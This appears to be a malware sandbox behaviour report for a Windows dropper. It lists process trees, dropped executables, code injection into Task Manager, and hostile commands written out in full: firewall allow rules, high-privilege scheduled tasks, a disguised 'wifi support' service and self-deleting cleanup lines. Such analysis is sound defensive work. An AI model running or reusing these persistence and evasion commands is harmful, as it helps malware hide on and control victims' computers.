PID 1652 wrote to memory of 4284	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Updbdate.exe
PID 1652 wrote to memory of 4284	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Updbdate.exe
PID 1652 wrote to memory of 1672	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	File.exe
PID 1652 wrote to memory of 1672	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	File.exe
PID 1652 wrote to memory of 1672	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	File.exe
PID 1652 wrote to memory of 1292	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Install.exe
PID 1652 wrote to memory of 1292	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Install.exe
PID 1652 wrote to memory of 1292	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Install.exe
PID 1652 wrote to memory of 3552	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	pub2.exe
PID 1652 wrote to memory of 3552	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	pub2.exe
PID 1652 wrote to memory of 3552	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	pub2.exe
PID 1652 wrote to memory of 3516	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Files.exe
PID 1652 wrote to memory of 3516	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Files.exe
PID 1652 wrote to memory of 3516	1652	b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe	Files.exe
PID 3516 wrote to memory of 812	3516	Files.exe	jfiag3g_gg.exe
PID 3516 wrote to memory of 812	3516	Files.exe	jfiag3g_gg.exe
PID 3516 wrote to memory of 812	3516	Files.exe	jfiag3g_gg.exe
PID 3428 wrote to memory of 4324	3428	Folder.exe	Folder.exe
PID 3428 wrote to memory of 4324	3428	Folder.exe	Folder.exe
PID 3428 wrote to memory of 4324	3428	Folder.exe	Folder.exe
PID 1292 wrote to memory of 1680	1292	Install.exe	cmd.exe
PID 1292 wrote to memory of 1680	1292	Install.exe	cmd.exe
PID 1292 wrote to memory of 1680	1292	Install.exe	cmd.exe
PID 1680 wrote to memory of 2484	1680	cmd.exe	taskkill.exe
PID 1680 wrote to memory of 2484	1680	cmd.exe	taskkill.exe
PID 1680 wrote to memory of 2484	1680	cmd.exe	taskkill.exe
PID 4888 wrote to memory of 4596	4888	rUNdlL32.eXe	rundll32.exe
PID 4888 wrote to memory of 4596	4888	rUNdlL32.eXe	rundll32.exe
PID 4888 wrote to memory of 4596	4888	rUNdlL32.eXe	rundll32.exe
PID 3516 wrote to memory of 2100	3516	Files.exe	jfiag3g_gg.exe
PID 3516 wrote to memory of 2100	3516	Files.exe	jfiag3g_gg.exe
PID 3516 wrote to memory of 2100	3516	Files.exe	jfiag3g_gg.exe
PID 3744 wrote to memory of 4184	3744	svchost.exe	Info.exe
PID 3744 wrote to memory of 4184	3744	svchost.exe	Info.exe
PID 3744 wrote to memory of 4184	3744	svchost.exe	Info.exe
PID 4184 wrote to memory of 4404	4184	Info.exe	cmd.exe
PID 4184 wrote to memory of 4404	4184	Info.exe	cmd.exe
PID 4404 wrote to memory of 5092	4404	cmd.exe	netsh.exe
PID 4404 wrote to memory of 5092	4404	cmd.exe	netsh.exe
PID 4184 wrote to memory of 2280	4184	Info.exe	csrss.exe
PID 4184 wrote to memory of 2280	4184	Info.exe	csrss.exe
PID 4184 wrote to memory of 2280	4184	Info.exe	csrss.exe
PID 3744 wrote to memory of 4032	3744	svchost.exe	schtasks.exe
PID 3744 wrote to memory of 4032	3744	svchost.exe	schtasks.exe
PID 1672 wrote to memory of 4724	1672	File.exe	6mviJ7aR7Iu4WIcfMy0NvNI_.exe
PID 1672 wrote to memory of 4724	1672	File.exe	6mviJ7aR7Iu4WIcfMy0NvNI_.exe
PID 1672 wrote to memory of 2228	1672	File.exe	XZgF1kubuwTPgORKbwIWc8XF.exe
PID 1672 wrote to memory of 2228	1672	File.exe	XZgF1kubuwTPgORKbwIWc8XF.exe
PID 1672 wrote to memory of 2228	1672	File.exe	XZgF1kubuwTPgORKbwIWc8XF.exe
PID 1672 wrote to memory of 3696	1672	File.exe	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
PID 1672 wrote to memory of 3696	1672	File.exe	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
PID 1672 wrote to memory of 3696	1672	File.exe	xcoJgJ3jOwvOCYaZ9aHe2a_S.exe

C:\Users\Admin\AppData\Local\Temp\b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe
"C:\Users\Admin\AppData\Local\Temp\b993c639fcc3b174e1117462becc2c5b0cf72c4c289c8e38c67a65afc905eb99.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1652

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3428

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:4324

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 368
3⤵
- Program crash
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 372
3⤵
- Program crash
PID:3744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 372
3⤵
- Program crash
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 664
3⤵
- Program crash
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 664
3⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 664
3⤵
- Program crash
PID:3172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 664
3⤵
- Program crash
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 752
3⤵
- Program crash
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 772
3⤵
- Program crash
PID:1680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 864
3⤵
- Program crash
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 880
3⤵
- Program crash
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 824
3⤵
- Program crash
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 860
3⤵
- Program crash
PID:1960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 744
3⤵
- Program crash
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 708
3⤵
- Program crash
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 916
3⤵
- Program crash
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 912
3⤵
- Program crash
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 752
3⤵
- Program crash
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 776
3⤵
- Program crash
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 924
3⤵
- Program crash
PID:4104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 916
3⤵
- Program crash
PID:4592

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 332
4⤵
- Program crash
PID:2408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 336
4⤵
- Program crash
PID:1048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 336
4⤵
- Program crash
PID:4248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 632
4⤵
- Program crash
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 632
4⤵
- Program crash
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 632
4⤵
- Program crash
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 632
4⤵
- Program crash
PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 708
4⤵
- Program crash
PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 724
4⤵
- Program crash
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 588
4⤵
- Program crash
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 676
4⤵
- Program crash
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 832
4⤵
- Program crash
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 740
4⤵
- Program crash
PID:3148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 696
4⤵
- Program crash
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 916
4⤵
- Program crash
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:5092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 836
4⤵
- Program crash
PID:2876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 836
4⤵
- Program crash
PID:3004

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:2280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 368
5⤵
- Program crash
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 388
5⤵
- Program crash
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 388
5⤵
- Program crash
PID:2728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 604
5⤵
- Program crash
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 704
5⤵
- Program crash
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 728
5⤵
- Program crash
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 692
5⤵
- Program crash
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 720
5⤵
- Program crash
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 752
5⤵
- Program crash
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 728
5⤵
- Program crash
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 640
5⤵
- Program crash
PID:2620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 760
5⤵
- Program crash
PID:1048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 760
5⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 908
5⤵
- Program crash
PID:680

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 928
5⤵
- Program crash
PID:400

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 976
5⤵
- Program crash
PID:808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 992
5⤵
- Program crash
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 968
5⤵
- Program crash
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1032
5⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1096
5⤵
- Program crash
PID:1216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1088
5⤵
- Program crash
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1080
5⤵
- Program crash
PID:812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 952
5⤵
- Program crash
PID:1388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1048
5⤵
- Program crash
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1108
5⤵
- Program crash
PID:824

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:4780

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1960

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 828
5⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 1080
5⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1672

C:\Users\Admin\Pictures\Adobe Films\6mviJ7aR7Iu4WIcfMy0NvNI_.exe
"C:\Users\Admin\Pictures\Adobe Films\6mviJ7aR7Iu4WIcfMy0NvNI_.exe"
3⤵
- Executes dropped EXE
PID:4724

C:\Users\Admin\Pictures\Adobe Films\XZgF1kubuwTPgORKbwIWc8XF.exe
"C:\Users\Admin\Pictures\Adobe Films\XZgF1kubuwTPgORKbwIWc8XF.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:2228

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4720

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4848

C:\Users\Admin\Pictures\Adobe Films\xcoJgJ3jOwvOCYaZ9aHe2a_S.exe
"C:\Users\Admin\Pictures\Adobe Films\xcoJgJ3jOwvOCYaZ9aHe2a_S.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4756

C:\Users\Admin\Pictures\Adobe Films\KEfmETAgqNAdVCVc4XRw9Pj7.exe
"C:\Users\Admin\Pictures\Adobe Films\KEfmETAgqNAdVCVc4XRw9Pj7.exe"
3⤵
- Executes dropped EXE
PID:4988

C:\Users\Admin\Pictures\Adobe Films\LWVoMJ1iYPn7C_b72UVjvdxl.exe
"C:\Users\Admin\Pictures\Adobe Films\LWVoMJ1iYPn7C_b72UVjvdxl.exe"
3⤵
PID:4596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:3368

C:\Users\Admin\Pictures\Adobe Films\XV0pxvfNqW38gHNH_S2xxNxI.exe
"C:\Users\Admin\Pictures\Adobe Films\XV0pxvfNqW38gHNH_S2xxNxI.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:3256

C:\Users\Admin\Pictures\Adobe Films\dBfm08dp7tr2snWCrtPvFaXq.exe
"C:\Users\Admin\Pictures\Adobe Films\dBfm08dp7tr2snWCrtPvFaXq.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:3208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
4⤵
PID:4392

C:\Windows\SysWOW64\timeout.exe
timeout 45
5⤵
- Delays execution with timeout.exe
PID:4788

C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe
"C:\Users\Admin\AppData\Local\Temp\Ztfglzprim.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1744

C:\Users\Admin\Pictures\Adobe Films\dBfm08dp7tr2snWCrtPvFaXq.exe
"C:\Users\Admin\Pictures\Adobe Films\dBfm08dp7tr2snWCrtPvFaXq.exe"
4⤵
- Executes dropped EXE
PID:3156

C:\Users\Admin\Pictures\Adobe Films\E_NWOTcfVYLaV_wZ5zpEF9UT.exe
"C:\Users\Admin\Pictures\Adobe Films\E_NWOTcfVYLaV_wZ5zpEF9UT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1772

C:\Users\Admin\Pictures\Adobe Films\9a2Ng614z6bhLGCrzLYAfNAQ.exe
"C:\Users\Admin\Pictures\Adobe Films\9a2Ng614z6bhLGCrzLYAfNAQ.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qpudfyio\
4⤵
PID:3920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lcdfhyng.exe" C:\Windows\SysWOW64\qpudfyio\
4⤵
PID:1304

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create qpudfyio binPath= "C:\Windows\SysWOW64\qpudfyio\lcdfhyng.exe /d\"C:\Users\Admin\Pictures\Adobe Films\9a2Ng614z6bhLGCrzLYAfNAQ.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:4844

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description qpudfyio "wifi internet conection"
4⤵
PID:4088

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start qpudfyio
4⤵
PID:1856

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:4212

C:\Users\Admin\emhfdsnc.exe
"C:\Users\Admin\emhfdsnc.exe" /d"C:\Users\Admin\Pictures\Adobe Films\9a2Ng614z6bhLGCrzLYAfNAQ.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zfnvaixm.exe" C:\Windows\SysWOW64\qpudfyio\
5⤵
PID:1648

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config qpudfyio binPath= "C:\Windows\SysWOW64\qpudfyio\zfnvaixm.exe /d\"C:\Users\Admin\emhfdsnc.exe\""
5⤵
PID:1856

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start qpudfyio
5⤵
PID:400

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 772
5⤵
PID:3148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 1196
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetWindowsHookEx
PID:4540

C:\Users\Admin\Pictures\Adobe Films\F_NbpSDXCvczSGhxRPvw_Wck.exe
"C:\Users\Admin\Pictures\Adobe Films\F_NbpSDXCvczSGhxRPvw_Wck.exe"
3⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im F_NbpSDXCvczSGhxRPvw_Wck.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\F_NbpSDXCvczSGhxRPvw_Wck.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2052

C:\Windows\SysWOW64\taskkill.exe
taskkill /im F_NbpSDXCvczSGhxRPvw_Wck.exe /f
5⤵
- Kills process with taskkill
PID:3172

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:4260

C:\Users\Admin\Pictures\Adobe Films\QjIdtMD1evPtZva6j3tHAkvA.exe
"C:\Users\Admin\Pictures\Adobe Films\QjIdtMD1evPtZva6j3tHAkvA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Users\Admin\Pictures\Adobe Films\LT4tmxErVD5_zzxX9XB9YITt.exe
"C:\Users\Admin\Pictures\Adobe Films\LT4tmxErVD5_zzxX9XB9YITt.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Users\Admin\Pictures\Adobe Films\MXupSkMesHFNzr2hty9FbzF7.exe
"C:\Users\Admin\Pictures\Adobe Films\MXupSkMesHFNzr2hty9FbzF7.exe"
3⤵
PID:4540

C:\Users\Admin\Pictures\Adobe Films\StKv78jSkNijWpJNIcVwxxO0.exe
"C:\Users\Admin\Pictures\Adobe Films\StKv78jSkNijWpJNIcVwxxO0.exe"
3⤵
- Executes dropped EXE
PID:1900

C:\Users\Admin\Pictures\Adobe Films\Bg8dhj9h9WN9iL5rxRrqPg3T.exe
"C:\Users\Admin\Pictures\Adobe Films\Bg8dhj9h9WN9iL5rxRrqPg3T.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:956

C:\Users\Admin\Pictures\Adobe Films\kw4MySvRV6v7vRzbdqtN4Srw.exe
"C:\Users\Admin\Pictures\Adobe Films\kw4MySvRV6v7vRzbdqtN4Srw.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3988

C:\Users\Admin\Pictures\Adobe Films\eh1l25nRy0rFGrLRC3H466bT.exe
"C:\Users\Admin\Pictures\Adobe Films\eh1l25nRy0rFGrLRC3H466bT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 468
4⤵
PID:1180

C:\Users\Admin\Pictures\Adobe Films\cD9FlfWbZ9sd_NRTN8AYFKRo.exe
"C:\Users\Admin\Pictures\Adobe Films\cD9FlfWbZ9sd_NRTN8AYFKRo.exe"
3⤵
- Executes dropped EXE
PID:4292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\cD9FlfWbZ9sd_NRTN8AYFKRo.exe
4⤵
PID:1548

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:4600

C:\Users\Admin\Pictures\Adobe Films\NIRcHNTRudugx7nWthADgbVt.exe
"C:\Users\Admin\Pictures\Adobe Films\NIRcHNTRudugx7nWthADgbVt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4628

C:\Users\Admin\Pictures\Adobe Films\t5xN8B6ioDdfpRJf6isCyntE.exe
"C:\Users\Admin\Pictures\Adobe Films\t5xN8B6ioDdfpRJf6isCyntE.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4852

C:\Windows\SysWOW64\cmd.exe
